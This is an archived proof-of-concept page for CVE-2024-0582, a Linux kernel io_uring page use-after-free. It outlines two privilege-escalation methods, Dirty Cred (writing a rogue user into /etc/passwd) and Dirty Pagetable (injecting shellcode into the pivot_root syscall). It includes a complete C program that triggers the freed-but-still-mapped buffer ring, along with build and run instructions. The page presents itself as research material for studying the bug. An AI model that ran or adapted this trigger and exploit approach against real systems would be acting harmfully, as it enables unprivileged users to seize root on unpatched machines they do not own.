POC details: 3f0e43fd91caaf066b2679456913ac7054f20b93

Source
Related vulnerability
Title: Linux kernel security vulnerability (CVE-2024-0582)
Description: The Linux kernel is the kernel used by Linux, the open-source operating system of the US-based Linux Foundation. The Linux kernel contains a security vulnerability that the advisory text attributes to a memory-leak problem (in practice, freed io_uring buffer-ring pages that stay mapped in user space); it allows a local user to crash the system or escalate privileges.
Description
A data-only exploit for CVE-2024-0582
Introduction
# CVE-2024-0582 Exploit (PoC)

This repository provides a Proof-of-Concept (PoC) exploit for **CVE-2024-0582**, with both a **Dirty Cred** and a **Dirty Pagetable** attack method for gaining root privileges.

## Description

- **Based on Google Project Zero's PoC:** This exploit differs from other PoCs on GitHub in that it is heavily based on the PoC described in [a Google Project Zero](https://project-zero.issues.chromium.org/issues/42451653) issue.

- **Additional References:** The exploit also draws on the [Exodus Intelligence blog post](https://blog.exodusintel.com/2024/03/27/mind-the-patch-gap-exploiting-an-io_uring-vulnerability-in-ubuntu/) and [ptrYudai's blog post](https://ptr-yudai.hatenablog.com/entry/2023/12/08/093606).
- **Bug Overview:** *CVE-2024-0582* is a flaw in the `io_uring` subsystem: a kernel-allocated provided-buffer ring that user space has mapped is unregistered and its pages freed while the user mapping stays in place, giving unprivileged code read/write access to freed memory pages (a page use-after-free).

### Current Exploit Method

1. **Dirty Cred**
   - Uses an `io_uring` **register/unregister** sequence to trigger the page use-after-free.
   - Gains write access to `/etc/passwd`.
   - Injects a rogue user entry into `/etc/passwd`.

2. **Dirty Pagetable**
   - Uses the same `io_uring` **register/unregister** sequence to trigger the *page use-after-free*.
   - Gains write access to a page table.
   - Injects shellcode into the `pivot_root` syscall.
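Both methods start from the same trigger, so the following C program, added here as an example and not taken from the repository, performs that register/mmap/unregister sequence against the public io_uring UAPI: it registers a kernel-allocated provided-buffer ring (`IORING_REGISTER_PBUF_RING` with `IOU_PBUF_RING_MMAP`), maps it through the `IORING_OFF_PBUF_RING` offset, writes a marker, and unregisters the ring while the mapping is still alive. The constants and the `io_uring_buf_reg` layout are restated from the kernel's `io_uring.h` under local names (so the file compiles where that header is old or missing), the syscall numbers fall back to the x86_64 values, and `trigger_pbuf_ring_sequence`, `pbuf_ring_mmap_offset`, `pbuf_ring_map_len` and `pbuf_ring_reg_init` are names chosen for this example. It only leaves the dangling mapping in place and reports it; it does not show the freed page being reused and contains none of the Dirty Cred or Dirty Pagetable logic.

```c
// Added reproducer of the io_uring buffer-ring register/mmap/unregister
// sequence (example code, not the repository's exploit). Assumptions: Linux,
// 64-bit off_t, x86_64 syscall numbers as a fallback; UAPI constants and the
// io_uring_buf_reg layout are restated instead of including <linux/io_uring.h>.
#define _GNU_SOURCE
#include <errno.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>
#include <unistd.h>
#include <sys/mman.h>
#include <sys/syscall.h>

#ifndef SYS_io_uring_setup
#define SYS_io_uring_setup    425   /* x86_64 value, used if the header lacks it */
#endif
#ifndef SYS_io_uring_register
#define SYS_io_uring_register 427
#endif

/* From the kernel's io_uring UAPI header. */
#define IORING_REGISTER_PBUF_RING   22
#define IORING_UNREGISTER_PBUF_RING 23
#define IOU_PBUF_RING_MMAP          1u          /* kernel allocates the ring, user mmaps it */
#define IORING_OFF_PBUF_RING        0x80000000ULL
#define IORING_OFF_PBUF_SHIFT       16

long syscall(long number, ...);   /* libc prototype, restated in case a strict -std hides it */

struct pbuf_reg {                 /* same 40-byte layout as struct io_uring_buf_reg */
    uint64_t ring_addr;           /* must be 0 when IOU_PBUF_RING_MMAP is set */
    uint32_t ring_entries;        /* power of two, below 65536 */
    uint16_t bgid;                /* buffer group id the ring is registered under */
    uint16_t flags;
    uint64_t resv[3];
};

/* mmap() offset that selects the kernel-allocated ring of buffer group bgid. */
uint64_t pbuf_ring_mmap_offset(uint16_t bgid)
{
    return IORING_OFF_PBUF_RING | ((uint64_t)bgid << IORING_OFF_PBUF_SHIFT);
}

/* Mapping length: ring_entries * sizeof(struct io_uring_buf) (16 bytes), rounded up to pages. */
size_t pbuf_ring_map_len(uint32_t ring_entries, size_t page_size)
{
    size_t bytes = (size_t)ring_entries * 16;
    return (bytes + page_size - 1) / page_size * page_size;
}

/* Registration request for a kernel-allocated, user-mappable ring. */
void pbuf_ring_reg_init(struct pbuf_reg *reg, uint32_t ring_entries, uint16_t bgid)
{
    memset(reg, 0, sizeof(*reg));
    reg->ring_entries = ring_entries;
    reg->bgid = bgid;
    reg->flags = IOU_PBUF_RING_MMAP;
}

/*
 * Set up a ring, register a mmap'able buffer ring, map it, write a marker, then
 * unregister the ring while the mapping is still alive. Without the upstream fix
 * the ring pages are freed here although *map still refers to them (the page
 * use-after-free both methods build on); with the fix their release is deferred
 * until the ring fd is closed. Returns 0 with *ring_fd/*map/*map_len left open
 * for the caller, or -errno on failure.
 */
int trigger_pbuf_ring_sequence(uint16_t bgid, uint32_t ring_entries,
                               int *ring_fd, void **map, size_t *map_len)
{
    uint32_t params[30] = {0};    /* zeroed 120-byte struct io_uring_params */
    struct pbuf_reg reg;
    int err;
    long fd = syscall(SYS_io_uring_setup, 8, params);
    if (fd < 0)
        return -errno;

    pbuf_ring_reg_init(&reg, ring_entries, bgid);
    if (syscall(SYS_io_uring_register, fd, IORING_REGISTER_PBUF_RING, &reg, 1) < 0) {
        err = errno; goto fail;   /* EINVAL/ENOSYS: no mmap'able rings on this kernel */
    }
    *map_len = pbuf_ring_map_len(ring_entries, (size_t)sysconf(_SC_PAGESIZE));
    *map = mmap(NULL, *map_len, PROT_READ | PROT_WRITE, MAP_SHARED,
                (int)fd, (off_t)pbuf_ring_mmap_offset(bgid));
    if (*map == MAP_FAILED) {
        err = errno; goto fail;
    }
    memset(*map, 0x41, 64);       /* marker written through the live mapping */

    reg.flags = 0;                /* the unregister path rejects any flag bits */
    if (syscall(SYS_io_uring_register, fd, IORING_UNREGISTER_PBUF_RING, &reg, 1) < 0) {
        err = errno; munmap(*map, *map_len); goto fail;
    }
    *ring_fd = (int)fd;
    return 0;                     /* *map is now the stale mapping */
fail:
    close((int)fd);
    return -err;
}

int main(void)
{
    int fd; void *map; size_t len;
    int rc = trigger_pbuf_ring_sequence(0, 8, &fd, &map, &len);
    if (rc) {
        fprintf(stderr, "sequence failed: %s\n", strerror(-rc));
        return 1;
    }
    printf("ring unregistered; %zu-byte mapping at %p still present, first byte 0x%02x\n",
           len, map, ((unsigned char *)map)[0]);
    munmap(map, len);
    close(fd);
    return 0;
}
```

Build with `cc -o pbuf_trigger pbuf_trigger.c` and run as an unprivileged user. `EINVAL` or `ENOSYS` from the register step means the kernel has no mmap'able buffer rings at all (they arrived in 6.4), so the bug cannot be reached; `EPERM` from `io_uring_setup` usually means the `kernel.io_uring_disabled` sysctl is set. On kernels carrying the upstream fix the same sequence runs without freeing the pages, because release of mapped rings is deferred until the ring is torn down. The offset and length arithmetic lives in separate helpers so it can be checked without a kernel.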

## Adjust the Offset Values

Before building, make sure the offset values for each exploit are configured correctly. Refer to the documentation in:
- [Dirty Cred](dirty_cred/README.md#determining-the-correct-offset-values)
- [Dirty Pagetable](dirty_page_table/README.md#determining-the-correct-offset-values)

These offsets vary with the kernel version and environment.

## Disclaimer
This repository and all its contents are for educational and research purposes only. Do not use this exploit on systems you do not own or have explicit permission to test. The author(s) assume no liability for any misuse or damage caused by this material.

File snapshot

[4.0K] /data/pocs/3f0e43fd91caaf066b2679456913ac7054f20b93
├── [4.0K] dirty_cred
│   ├── [4.0K] c
│   │   ├── [8.5K] exploit.c
│   │   └── [1.1K] Makefile
│   ├── [2.0K] README.md
│   └── [4.0K] rust
│       ├── [ 118] Cargo.toml
│       ├── [1.1K] Makefile
│       └── [4.0K] src
│           ├── [5.5K] main.rs
│           └── [5.9K] utils.rs
├── [4.0K] dirty_page_table
│   ├── [4.0K] c
│   │   ├── [ 10K] exploit.c
│   │   └── [1.1K] Makefile
│   └── [5.2K] README.md
├── [ 273] KERNEL_COMMIT_INFO
├── [138K] kernel.conf
├── [1.0K] LICENSE
├── [2.0K] README.md
└── [1.2K] run_qemu.sh

6 directories, 15 files
Cached for you by the Shenlong bot
Notes
    1. Prefer accessing the PoC through the source link.
    2. If the source has gone away or cannot be reached, email f.jinxu#gmail.com (replace # with @) to request the local snapshot.
    3. Shenlong has snapshotted the PoC code for you; to support long-term maintenance, please consider paying for local PoCs. Thank you for your support.